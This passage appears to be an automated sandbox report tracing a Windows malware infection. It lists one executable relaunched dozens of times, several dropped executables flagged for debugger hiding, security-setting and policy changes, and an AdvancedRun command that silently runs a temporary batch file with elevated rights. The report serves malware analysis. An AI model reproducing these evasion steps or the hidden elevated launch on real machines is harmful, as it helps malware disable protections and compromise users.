C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8244 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10332 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10760 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9192 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
-
C:\Users\Admin\Documents\S2XPB9E_c2fXgAtzyOsjFidz.exe"C:\Users\Admin\Documents\S2XPB9E_c2fXgAtzyOsjFidz.exe"2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\inst1.exe"C:\Program Files (x86)\Company\NewProduct\inst1.exe"3⤵
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Documents\uFkBkc5ExbcwhNMe_DNXMk3Z.exe"C:\Users\Admin\Documents\uFkBkc5ExbcwhNMe_DNXMk3Z.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\DZJdoQBawZIRTjYfBFodSs03.exe"C:\Users\Admin\Documents\DZJdoQBawZIRTjYfBFodSs03.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\DZJdoQBawZIRTjYfBFodSs03.exe"C:\Users\Admin\Documents\DZJdoQBawZIRTjYfBFodSs03.exe"3⤵
-
-
-
C:\Users\Admin\Documents\sOyXqXENHJ2NeF5SGRuq1HDW.exe"C:\Users\Admin\Documents\sOyXqXENHJ2NeF5SGRuq1HDW.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\OrtvqXJXXZ53o_eOhODIyXyC.exe"C:\Users\Admin\Documents\OrtvqXJXXZ53o_eOhODIyXyC.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\OrtvqXJXXZ53o_eOhODIyXyC.exe"C:\Users\Admin\Documents\OrtvqXJXXZ53o_eOhODIyXyC.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Documents\lqtegPSCqaQL0BkETsnNX2J5.exe"C:\Users\Admin\Documents\lqtegPSCqaQL0BkETsnNX2J5.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 2443⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\Y8LE_a6emvYyv9d67QKtEh5h.exe"C:\Users\Admin\Documents\Y8LE_a6emvYyv9d67QKtEh5h.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\ISrB_dvDm1IkVUo_XGeYeA5p.exe"C:\Users\Admin\Documents\ISrB_dvDm1IkVUo_XGeYeA5p.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\xazowB24hxO2_b9ZeaYd6yML.exe"C:\Users\Admin\Documents\xazowB24hxO2_b9ZeaYd6yML.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\gBaUMdeBsiBdikEiNiY5NoXS.exe"C:\Users\Admin\Documents\gBaUMdeBsiBdikEiNiY5NoXS.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\123ae933-3e73-49d7-8410-4e5fa71b2ff4\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\123ae933-3e73-49d7-8410-4e5fa71b2ff4\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\123ae933-3e73-49d7-8410-4e5fa71b2ff4\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\123ae933-3e73-49d7-8410-4e5fa71b2ff4\test.bat"4⤵
-
-
-
